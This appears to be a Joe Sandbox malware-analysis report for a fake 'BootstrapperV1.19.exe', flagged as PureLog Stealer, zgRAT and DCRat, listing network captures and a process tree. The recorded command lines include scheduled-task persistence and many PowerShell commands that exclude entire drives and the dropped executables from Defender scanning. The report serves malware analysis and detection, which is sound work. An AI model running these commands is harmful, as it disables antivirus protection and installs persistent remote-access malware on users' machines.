                                                    connection: close
                                                    2024-09-14 10:52:10 UTC119INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 36 34 32 2e 30 2e 36 34 32 30 36 33 36 22 2c 22 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 55 70 6c 6f 61 64 22 3a 22 76 65 72 73 69 6f 6e 2d 34 33 61 64 31 38 35 33 61 64 39 31 34 32 37 64 22 2c 22 62 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 22 31 2c 20 36 2c 20 30 2c 20 36 34 32 30 36 33 36 22 7d
                                                    Data Ascii: {"version":"0.642.0.6420636","clientVersionUpload":"version-43ad1853ad91427d","bootstrapperVersion":"1, 6, 0, 6420636"}


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.449735104.20.23.464437152C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-09-14 10:52:12 UTC193OUTGET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1
                                                    Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/
                                                    Host: www.nodejs.org
                                                    Connection: Keep-Alive
                                                    2024-09-14 10:52:12 UTC497INHTTP/1.1 307 Temporary Redirect
                                                    Date: Sat, 14 Sep 2024 10:52:12 GMT
                                                    Content-Type: text/plain
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: public, max-age=0, must-revalidate
                                                    location: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                    x-vercel-id: iad1::8gf89-1726311132489-44c62f5fb636
                                                    CF-Cache-Status: DYNAMIC
                                                    X-Content-Type-Options: nosniff
                                                    Server: cloudflare
                                                    CF-RAY: 8c2fd381df0772a7-EWR
                                                    2024-09-14 10:52:12 UTC20INData Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a
                                                    Data Ascii: fRedirecting...
                                                    2024-09-14 10:52:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:06:52:01
                                                    Start date:14/09/2024
                                                    Path:C:\Users\user\Desktop\BootstrapperV1.19.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\BootstrapperV1.19.exe"
                                                    Imagebase:0x400000
                                                    File size:3'247'616 bytes
                                                    MD5 hash:C9D720A4200DF5064F655ADC3656056F
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1695171822.0000000003269000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1688952530.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:06:52:01
                                                    Start date:14/09/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe"
                                                    Imagebase:0x158ac680000
                                                    File size:995'840 bytes
                                                    MD5 hash:90FD25CED85FE6DB28D21AE7D1F02E2C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 45%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:06:52:01
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:06:52:01
                                                    Start date:14/09/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe"
                                                    Imagebase:0xd20000
                                                    File size:2'241'785 bytes
                                                    MD5 hash:B444FEC863C995EC2C4810FC308F08C2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.1697999893.0000000004F02000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.1698866320.0000000005017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 55%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:06:52:02
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe"
                                                    Imagebase:0x410000
                                                    File size:147'456 bytes
                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:06:52:12
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7152 -s 2180
                                                    Imagebase:0x7ff754b30000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:06:52:31
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5sOqbfN.bat" "
                                                    Imagebase:0x240000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:06:52:31
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:06:52:31
                                                    Start date:14/09/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe"
                                                    Imagebase:0xe00000
                                                    File size:1'920'000 bytes
                                                    MD5 hash:3C3B7D5864E9F151A77B33D4B9D15E3C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000000.1994292109.0000000000E02000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.2305646369.000000001348B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 58%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:06:52:33
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f
                                                    Imagebase:0x7ff76f990000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:06:52:34
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff76f990000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:24
                                                    Start time:06:52:34
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff76f990000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:32
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:33
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:34
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff71e800000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:35
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:36
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:37
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:38
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:39
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:40
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:41
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:42
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:43
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:44
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:45
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:46
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:47
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:48
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:49
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:50
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:51
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:52
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:53
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:54
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:55
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:56
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:57
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:58
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\SIHClient.exe'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:59
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:60
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:61
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:62
                                                    Start time:06:52:35
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\RuntimeBroker.exe'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:63
                                                    Start time:06:52:36
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:64
                                                    Start time:06:52:36
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:65
                                                    Start time:06:52:36
                                                    Start date:14/09/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
